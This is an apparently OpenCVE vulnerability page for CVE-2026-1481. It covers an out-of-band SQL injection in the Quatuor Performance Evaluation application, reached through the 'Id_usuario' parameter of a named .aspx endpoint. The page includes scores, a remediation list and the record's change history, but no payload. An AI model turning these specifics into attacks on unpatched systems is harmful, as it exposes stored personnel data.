Description
An out-of-band SQL injection vulnerability (OOB SQLi) has been detected in the Performance Evaluation (EDD) application developed by Gabinete Técnico de Programación. Exploiting this vulnerability in the parameter 'Id_usuario' in '/evaluacion_objetivos_anyo_sig_ver_auto.aspx', could allow an attacker to extract sensitive information from the database through external channels, without the affected application returning the data directly, compromising the confidentiality of the stored information.
Published: 2026-01-27
Score: 9.3 Critical
EPSS: < 1% Very Low
KEV: No
Impact: Confidentiality compromise through out-of-band SQL injection
Action: Immediate Patch
AI Analysis

Impact

This vulnerability is an out-of-band SQL injection that allows an attacker to cause the backend database to transmit sensitive data through an external channel, triggered via the Id_usuario parameter in the /evaluacion_objetivos_anyo_sig_ver_auto.aspx endpoint. Because the data is sent through an external channel rather than returned in the response, the intrusion can remain hidden from the application and only the confidentiality of the stored data is at risk. The weakness is enumerated as CWE‑89, reflecting inadequate handling of untrusted input in database queries.

Affected Systems

The flaw affects the Quatuor Evaluación de Desempeño (EDD) performance evaluation application, all releases before the November 12 2025 patch. The application is used by Gabinete Técnico de Programación to store and retrieve performance metrics. No other vendors or products are listed as impacted.

Risk and Exploitability

The CVSS score of 9.3 indicates a high-severity condition, and the EPSS score of < 1 % suggests a low but non‑zero chance of exploitation in the wild. The vulnerability is not listed in the CISA KEV catalog, so no mass‑deployment exploitation has been observed yet. The attack vector is likely remote and network-based: an attacker crafts a malicious Id_usuario value and sends it to the web endpoint, relying on the application’s outbound database connections to leak data via an external channel. Exploitation requires only that the target application be reachable and willing to process the parameter.

Generated by OpenCVE AI on April 18, 2026 at 14:46 UTC.

Remediation

Vendor Solution

The vulnerabilities have been resolved in the latest version of the application, released on November 12, 2025, and are no longer exploitable.

OpenCVE Recommended Actions

  • Upgrade to the version of the application released on November 12 2025, which contains the fix.
  • Restrict or disable outbound network traffic from the application server that could be used to transmit data to external systems, thereby blocking the out-of-band channel.
  • Implement input validation or parameterized queries for the Id_usuario parameter to eliminate injection vectors, following best practices for preventing SQL injection (CWE‑89).

Generated by OpenCVE AI on April 18, 2026 at 14:46 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Tue, 10 Feb 2026 20:30:00 +0000

Type Values Removed Values Added
CPEs cpe:2.3:a:quatuor:evaluacion_de_desempeno:-:*:*:*:*:*:*:*
Metrics cvssV3_1

{'score': 7.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}

Tue, 27 Jan 2026 20:30:00 +0000

Type Values Removed Values Added
First Time appeared Quatuor
Quatuor evaluacion De Desempeno
Vendors & Products Quatuor
Quatuor evaluacion De Desempeno

Tue, 27 Jan 2026 19:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'yes', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Tue, 27 Jan 2026 17:00:00 +0000

Type Values Removed Values Added
Description An out-of-band SQL injection vulnerability (OOB SQLi) has been detected in the Performance Evaluation (EDD) application developed by Gabinete Técnico de Programación. Exploiting this vulnerability in the parameter 'Id_usuario' in '/evaluacion_objetivos_anyo_sig_ver_auto.aspx', could allow an attacker to extract sensitive information from the database through external channels, without the affected application returning the data directly, compromising the confidentiality of the stored information.
Title Out-of-band SQL injection in Quatuor Performance Evaluation
Weaknesses CWE-89
References
Metrics cvssV4_0

{'score': 9.3, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N'}

Subscriptions

Quatuor Evaluacion De Desempeno
cve-icon MITRE

Status: PUBLISHED

Assigner: INCIBE

Published:

Updated: 2026-01-27T18:32:12.743Z

Reserved: 2026-01-27T09:25:57.860Z

Link: CVE-2026-1481

cve-icon Vulnrichment

Updated: 2026-01-27T18:32:06.211Z

cve-icon NVD

Status : Analyzed

Published: 2026-01-27T17:16:11.687

Modified: 2026-02-10T20:19:16.253

Link: CVE-2026-1481

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-18T15:00:03Z

Weaknesses